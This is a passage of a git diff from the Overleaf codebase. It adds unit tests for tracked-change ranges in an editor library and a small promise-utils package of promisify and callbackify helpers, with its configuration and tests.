'2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not merge tracked changes if there is a space between them', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 5, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(4, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 4, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 8, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) + + describe('with different authors', function () { + it('should not merge consecutive tracked changes', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(3, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 3, length: 3 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not merge tracked changes at same position', function () { + const trackedChanges = 
TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(0, 'foo', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 3 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 3, length: 3 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should insert tracked changes in the middle of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(3) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 11, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should insert tracked changes at the end of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should split a tracked range when inserting at the last contained cursor', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(4, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(3) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 4 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 4, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 10, length: 1 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should insert a new range if inserted just before the first cursor of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 5,
length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyInsert(5, 'foobar', { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 5, length: 6 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 11, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) + }) + + describe('applyDelete', function () { + it('should shrink tracked changes', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(5, 2) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 8 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should delete tracked changes when the whole range is deleted', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(0, 10) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete tracked changes when more than the whole range is deleted', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 5, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(0, 25) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should shrink the tracked change from start with overlap', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(1, 9) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 1 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should shrink the tracked change from end with overlap', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyDelete(0, 9) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 1 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) + + describe('fromRaw & toRaw', function () { + it('should survive serialization', function () { + /** @type {TrackedChangeRawData[]} */ + const initialRaw = [ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ] + + const trackedChanges = TrackedChangeList.fromRaw(initialRaw) + const raw = trackedChanges.toRaw() + const newTrackedChanges = 
TrackedChangeList.fromRaw(raw) + + expect(newTrackedChanges).to.deep.equal(trackedChanges) + expect(raw).to.deep.equal(initialRaw) + }) + }) + + describe('applyRetain', function () { + it('should add tracking information to an untracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([]) + trackedChanges.applyRetain(0, 10, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should shrink a tracked range to make room for a retained operation', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 3, length: 7 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 5, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should break up a tracked range to make room for a retained operation', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(5, 1, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(3) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 5 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 5, length: 1 }, + tracking: { + type: 'insert', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 6, length: 4 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should update the timestamp of a tracked range', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(1, 12, { + tracking: TrackingProps.fromRaw({ + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 13 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should ignore a retain operation with no tracking info', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 10 }, + tracking: { + type:
'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should not break up a tracked change for a retain with no tracking info', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(4, 1) + expect(trackedChanges.length).to.equal(1) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + }) + + it('should delete a tracked change which is being resolved', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete a tracked change which is being resolved by another user', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'insert', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete a tracked change which is being rejected', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should delete a tracked change which is being rejected by another user', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 0, length: 10 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(0, 10, { + tracking: new ClearTrackingProps(), + }) + expect(trackedChanges.length).to.equal(0) + expect(trackedChanges.toRaw()).to.deep.equal([]) + }) + + it('should append a new tracked change when retaining a range from another user with tracking info', function () { + const trackedChanges = TrackedChangeList.fromRaw([ + { + range: { pos: 4, length: 4 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + ]) + trackedChanges.applyRetain(8, 1, { + tracking: TrackingProps.fromRaw({ + type: 'delete', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }), + }) + expect(trackedChanges.length).to.equal(2) + expect(trackedChanges.toRaw()).to.deep.equal([ + { + range: { pos: 4, length: 4 }, + tracking: { + type: 'delete', + userId: 'user1', + ts: '2023-01-01T00:00:00.000Z', + }, + }, + { + range: { pos: 8, length: 1 }, + tracking: { + type: 'delete', + userId: 'user2', + ts: '2024-01-01T00:00:00.000Z', + }, + }, + ]) + }) + }) +}) diff --git a/libraries/overleaf-editor-core/tsconfig.json b/libraries/overleaf-editor-core/tsconfig.json new file mode 100644 index 0000000..d43bb24 --- /dev/null +++ b/libraries/overleaf-editor-core/tsconfig.json @@ -0,0 +1,7 @@ +{ + 
"extends": "../../tsconfig.backend.json", + "include": [ + "**/*.js", + "**/*.cjs" + ] +} diff --git a/libraries/promise-utils/.gitignore b/libraries/promise-utils/.gitignore new file mode 100644 index 0000000..edb0f85 --- /dev/null +++ b/libraries/promise-utils/.gitignore @@ -0,0 +1,3 @@ + +# managed by monorepo$ bin/update_build_scripts +.npmrc diff --git a/libraries/promise-utils/.mocharc.json b/libraries/promise-utils/.mocharc.json new file mode 100644 index 0000000..3be9ee5 --- /dev/null +++ b/libraries/promise-utils/.mocharc.json @@ -0,0 +1,5 @@ +{ + "ui": "bdd", + "recursive": "true", + "reporter": "spec" +} diff --git a/libraries/promise-utils/.nvmrc b/libraries/promise-utils/.nvmrc new file mode 100644 index 0000000..0254b1e --- /dev/null +++ b/libraries/promise-utils/.nvmrc @@ -0,0 +1 @@ +20.18.2 diff --git a/libraries/promise-utils/buildscript.txt b/libraries/promise-utils/buildscript.txt new file mode 100644 index 0000000..51a6dad --- /dev/null +++ b/libraries/promise-utils/buildscript.txt @@ -0,0 +1,10 @@ +promise-utils +--dependencies=None +--docker-repos=gcr.io/overleaf-ops +--env-add= +--env-pass-through= +--esmock-loader=False +--is-library=True +--node-version=20.18.2 +--public-repo=False +--script-version=4.7.0 diff --git a/libraries/promise-utils/index.js b/libraries/promise-utils/index.js new file mode 100644 index 0000000..557210a --- /dev/null +++ b/libraries/promise-utils/index.js @@ -0,0 +1,283 @@ +const { promisify, callbackify } = require('node:util') +const pLimit = require('p-limit') + +module.exports = { + promisify, + promisifyAll, + promisifyClass, + promisifyMultiResult, + callbackify, + callbackifyAll, + callbackifyClass, + callbackifyMultiResult, + expressify, + expressifyErrorHandler, + promiseMapWithLimit, + promiseMapSettledWithLimit, +} + +/** + * Promisify all functions in a module. + * + * This is meant to be used only when all functions in the module are async + * callback-style functions. + * + * It's very much tailored to our current module structure. In particular, it + * binds `this` to the module when calling the function in order not to break + * modules that call sibling functions using `this`. + * + * This will not magically fix all modules. Special cases should be promisified + * manually. + * + * The second argument is a bag of options: + * + * - without: an array of function names that shouldn't be promisified + * + * - multiResult: an object whose keys are function names and values are lists + * of parameter names. This is meant for functions that invoke their callbacks + * with more than one result in separate parameters. The promisifed function + * will return these results as a single object, with each result keyed under + * the corresponding parameter name. + */ +function promisifyAll(module, opts = {}) { + const { without = [], multiResult = {} } = opts + const promises = {} + for (const propName of Object.getOwnPropertyNames(module)) { + if (without.includes(propName)) { + continue + } + const propValue = module[propName] + if (typeof propValue !== 'function') { + continue + } + if (multiResult[propName] != null) { + promises[propName] = promisifyMultiResult( + propValue, + multiResult[propName] + ).bind(module) + } else { + promises[propName] = promisify(propValue).bind(module) + } + } + return promises +} + +/** + * Promisify all methods in a class. 
+ * + * Options are the same as for promisifyAll + */ +function promisifyClass(cls, opts = {}) { + const promisified = class extends cls {} + const { without = [], multiResult = {} } = opts + for (const propName of Object.getOwnPropertyNames(cls.prototype)) { + if (propName === 'constructor' || without.includes(propName)) { + continue + } + const propValue = cls.prototype[propName] + if (typeof propValue !== 'function') { + continue + } + if (multiResult[propName] != null) { + promisified.prototype[propName] = promisifyMultiResult( + propValue, + multiResult[propName] + ) + } else { + promisified.prototype[propName] = promisify(propValue) + } + } + return promisified +} + +/** + * Promisify a function that returns multiple results via additional callback + * parameters. + * + * The promisified function returns the results in a single object whose keys + * are the names given in the array `resultNames`. + * + * Example: + * + * function f(callback) { + * return callback(null, 1, 2, 3) + * } + * + * const g = promisifyMultiResult(f, ['a', 'b', 'c']) + * + * const result = await g() // returns {a: 1, b: 2, c: 3} + */ +function promisifyMultiResult(fn, resultNames) { + function promisified(...args) { + return new Promise((resolve, reject) => { + try { + fn.bind(this)(...args, (err, ...results) => { + if (err != null) { + return reject(err) + } + const promiseResult = {} + for (let i = 0; i < resultNames.length; i++) { + promiseResult[resultNames[i]] = results[i] + } + resolve(promiseResult) + }) + } catch (err) { + reject(err) + } + }) + } + return promisified +} + +/** + * Reverse of `promisifyAll`. + * + * Callbackify all async functions in a module and return them in an object. In + * contrast with `promisifyAll`, all other exports from the module are added to + * the result. + * + * This is meant to be used like this: + * + * const MyPromisifiedModule = {...} + * module.exports = { + * ...callbackifyAll(MyPromisifiedModule), + * promises: MyPromisifiedModule + * } + * + * @param {Object} module - The module to callbackify + * @param {Object} opts - Options + * @param {Array} opts.without - Array of method names to exclude from + * being callbackified + * @param {Object} opts.multiResult - Spec of methods to be callbackified with + * callbackifyMultiResult() + */ +function callbackifyAll(module, opts = {}) { + const { without = [], multiResult = {} } = opts + const callbacks = {} + for (const propName of Object.getOwnPropertyNames(module)) { + if (without.includes(propName)) { + continue + } + const propValue = module[propName] + if (typeof propValue === 'function') { + if (propValue.constructor.name === 'AsyncFunction') { + if (multiResult[propName] != null) { + callbacks[propName] = callbackifyMultiResult( + propValue, + multiResult[propName] + ).bind(module) + } else { + callbacks[propName] = callbackify(propValue).bind(module) + } + } else { + callbacks[propName] = propValue.bind(module) + } + } else { + callbacks[propName] = propValue + } + } + return callbacks +} + +/** + * Callbackify all methods in a class. 
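+ *
+ * A minimal sketch of the intended use, mirroring the unit tests for this
+ * helper (Adder is an illustrative class, not part of this module): async
+ * methods on the class become callback-style methods on the returned
+ * subclass.
+ *
+ *   class Adder {
+ *     constructor(a) {
+ *       this.a = a
+ *     }
+ *     async asyncAdd(b) {
+ *       return this.a + b
+ *     }
+ *   }
+ *
+ *   const CallbackifiedAdder = callbackifyClass(Adder)
+ *   new CallbackifiedAdder(1).asyncAdd(2, (err, sum) => {
+ *     // err is null, sum is 3
+ *   })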
+ * + * Options are the same as for callbackifyAll + */ +function callbackifyClass(cls, opts = {}) { + const callbackified = class extends cls {} + const { without = [], multiResult = {} } = opts + for (const propName of Object.getOwnPropertyNames(cls.prototype)) { + if (propName === 'constructor' || without.includes(propName)) { + continue + } + const propValue = cls.prototype[propName] + if (typeof propValue !== 'function') { + continue + } + if (multiResult[propName] != null) { + callbackified.prototype[propName] = callbackifyMultiResult( + propValue, + multiResult[propName] + ) + } else { + callbackified.prototype[propName] = callbackify(propValue) + } + } + return callbackified +} + +/** + * Reverse the effect of `promisifyMultiResult`. + * + * This is meant for providing a temporary backward compatible callback + * interface while we migrate to promises. + */ +function callbackifyMultiResult(fn, resultNames) { + function callbackified(...args) { + const [callback] = args.splice(-1) + fn.apply(this, args) + .then(result => { + const cbResults = resultNames.map(resultName => result[resultName]) + callback(null, ...cbResults) + }) + .catch(err => { + callback(err) + }) + } + return callbackified +} + +/** + * Transform an async function into an Express middleware + * + * Any error will be passed to the error middlewares via `next()` + */ +function expressify(fn) { + return (req, res, next) => { + return fn(req, res, next).catch(next) + } +} + +/** + * Transform an async function into an Error Handling Express middleware + * + * Any error will be passed to the error middlewares via `next()` + */ +function expressifyErrorHandler(fn) { + return (err, req, res, next) => { + fn(err, req, res, next).catch(next) + } +} + +/** + * Map values in `array` with the async function `fn` + * + * Limit the number of unresolved promises to `concurrency`. + * @template T + * @template V + * @param {number} concurrency + * @param {Array<T>} array + * @param {(arg: T) => Promise<V>} fn + * @return {Promise<Array<Awaited<V>>>} + */ +async function promiseMapWithLimit(concurrency, array, fn) { + const limit = pLimit(concurrency) + return await Promise.all(array.map(x => limit(() => fn(x)))) +} + +/** + * Map values in `array` with the async function `fn` + * + * Limit the number of unresolved promises to `concurrency`. 
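+ *
+ * A usage sketch (illustrative only; `urls` and `fetchUrl` are hypothetical
+ * placeholders, not part of this module): unlike promiseMapWithLimit, a
+ * single rejection does not fail the whole batch.
+ *
+ *   const results = await promiseMapSettledWithLimit(2, urls, fetchUrl)
+ *   // results[i] is {status: 'fulfilled', value: ...} or
+ *   // {status: 'rejected', reason: ...}, in the order of `urls`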
+ * + * @template T, U + * @param {number} concurrency + * @param {Array<T>} array + * @param {(T) => Promise<U>} fn + * @return {Promise<Array<PromiseSettledResult<U>>>} + */ +function promiseMapSettledWithLimit(concurrency, array, fn) { + const limit = pLimit(concurrency) + return Promise.allSettled(array.map(x => limit(() => fn(x)))) +} diff --git a/libraries/promise-utils/package.json b/libraries/promise-utils/package.json new file mode 100644 index 0000000..40f05b7 --- /dev/null +++ b/libraries/promise-utils/package.json @@ -0,0 +1,27 @@ +{ + "name": "@overleaf/promise-utils", + "version": "0.1.0", + "description": "utilities to help working with promises", + "main": "index.js", + "scripts": { + "test": "npm run lint && npm run format && npm run types:check && npm run test:unit", + "test:unit": "mocha --exit test/**/*.{js,cjs}", + "lint": "eslint --ext .js --ext .cjs --ext .ts --max-warnings 0 --format unix .", + "lint:fix": "eslint --fix --ext .js --ext .cjs --ext .ts .", + "format": "prettier --list-different $PWD/'**/*.{js,cjs,ts}'", + "format:fix": "prettier --write $PWD/'**/*.{js,cjs,ts}'", + "test:ci": "npm run test:unit", + "types:check": "tsc --noEmit" + }, + "author": "Overleaf (https://www.overleaf.com)", + "license": "AGPL-3.0-only", + "devDependencies": { + "chai": "^4.3.10", + "chai-as-promised": "^7.1.1", + "mocha": "^11.1.0", + "typescript": "^5.0.4" + }, + "dependencies": { + "p-limit": "^2.3.0" + } +} diff --git a/libraries/promise-utils/test/setup.js b/libraries/promise-utils/test/setup.js new file mode 100644 index 0000000..0906818 --- /dev/null +++ b/libraries/promise-utils/test/setup.js @@ -0,0 +1,4 @@ +const chai = require('chai') +const chaiAsPromised = require('chai-as-promised') + +chai.use(chaiAsPromised) diff --git a/libraries/promise-utils/test/unit/PromiseUtilsTests.js b/libraries/promise-utils/test/unit/PromiseUtilsTests.js new file mode 100644 index 0000000..ad0e12a --- /dev/null +++ b/libraries/promise-utils/test/unit/PromiseUtilsTests.js @@ -0,0 +1,451 @@ +const { expect } = require('chai') +const { + promisifyAll, + promisifyClass, + callbackifyMultiResult, + callbackifyClass, + callbackifyAll, + expressify, + expressifyErrorHandler, +} = require('../..') + +describe('promisifyAll', function () { + describe('basic functionality', function () { + before(function () { + this.module = { + SOME_CONSTANT: 1, + asyncAdd(a, b, callback) { + callback(null, a + b) + }, + asyncDouble(x, callback) { + this.asyncAdd(x, x, callback) + }, + } + this.promisified = promisifyAll(this.module) + }) + + it('promisifies functions in the module', async function () { + const sum = await this.promisified.asyncAdd(29, 33) + expect(sum).to.equal(62) + }) + + it('binds this to the original module', async function () { + const sum = await this.promisified.asyncDouble(38) + expect(sum).to.equal(76) + }) + + it('does not copy over non-functions', async function () { + expect(this.promisified).not.to.have.property('SOME_CONSTANT') + }) + + it('does not modify the prototype of the module', async function () { + expect(this.promisified.toString()).to.equal('[object Object]') + }) + }) + + describe('without option', function () { + before(function () { + this.module = { + asyncAdd(a, b, callback) { + callback(null, a + b) + }, + syncAdd(a, b) { + return a + b + }, + } + this.promisified = promisifyAll(this.module, { without: ['syncAdd'] }) + }) + + it('does not promisify excluded functions', function () { + expect(this.promisified.syncAdd).not.to.exist + }) + + it('promisifies other functions', async function () { + 
const sum = await this.promisified.asyncAdd(12, 89) + expect(sum).to.equal(101) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.module = { + asyncAdd(a, b, callback) { + callback(null, a + b) + }, + asyncArithmetic(a, b, callback) { + callback(null, a + b, a * b) + }, + } + this.promisified = promisifyAll(this.module, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('promisifies multi-result functions', async function () { + const result = await this.promisified.asyncArithmetic(3, 6) + expect(result).to.deep.equal({ sum: 9, product: 18 }) + }) + + it('promisifies other functions normally', async function () { + const sum = await this.promisified.asyncAdd(6, 1) + expect(sum).to.equal(7) + }) + }) +}) + +describe('promisifyClass', function () { + describe('basic functionality', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + asyncAdd(b, callback) { + callback(null, this.a + b) + } + } + this.Promisified = promisifyClass(this.Class) + }) + + it('promisifies the class methods', async function () { + const adder = new this.Promisified(1) + const sum = await adder.asyncAdd(2) + expect(sum).to.equal(3) + }) + }) + + describe('without option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + asyncAdd(b, callback) { + callback(null, this.a + b) + } + + syncAdd(b) { + return this.a + b + } + } + this.Promisified = promisifyClass(this.Class, { without: ['syncAdd'] }) + }) + + it('does not promisify excluded functions', function () { + const adder = new this.Promisified(10) + const sum = adder.syncAdd(12) + expect(sum).to.equal(22) + }) + + it('promisifies other functions', async function () { + const adder = new this.Promisified(23) + const sum = await adder.asyncAdd(3) + expect(sum).to.equal(26) + }) + }) + + describe('multiResult option', function () { + before(function () { + this.Class = class { + constructor(a) { + this.a = a + } + + asyncAdd(b, callback) { + callback(null, this.a + b) + } + + asyncArithmetic(b, callback) { + callback(null, this.a + b, this.a * b) + } + } + this.Promisified = promisifyClass(this.Class, { + multiResult: { asyncArithmetic: ['sum', 'product'] }, + }) + }) + + it('promisifies multi-result functions', async function () { + const adder = new this.Promisified(3) + const result = await adder.asyncArithmetic(6) + expect(result).to.deep.equal({ sum: 9, product: 18 }) + }) + + it('promisifies other functions normally', async function () { + const adder = new this.Promisified(6) + const sum = await adder.asyncAdd(1) + expect(sum).to.equal(7) + }) + }) +}) + +describe('callbackifyMultiResult', function () { + it('callbackifies a multi-result function', function (done) { + async function asyncArithmetic(a, b) { + return { sum: a + b, product: a * b } + } + const callbackified = callbackifyMultiResult(asyncArithmetic, [ + 'sum', + 'product', + ]) + callbackified(3, 11, (err, sum, product) => { + if (err != null) { + return done(err) + } + expect(sum).to.equal(14) + expect(product).to.equal(33) + done() + }) + }) + + it('propagates errors', function (done) { + async function asyncBomb() { + throw new Error('BOOM!') + } + const callbackified = callbackifyMultiResult(asyncBomb, [ + 'explosives', + 'dynamite', + ]) + callbackified(err => { + expect(err).to.exist + done() + }) + }) +}) + +describe('callbackifyAll', function () { + describe('basic functionality', function () { + before(function () { + this.module = 
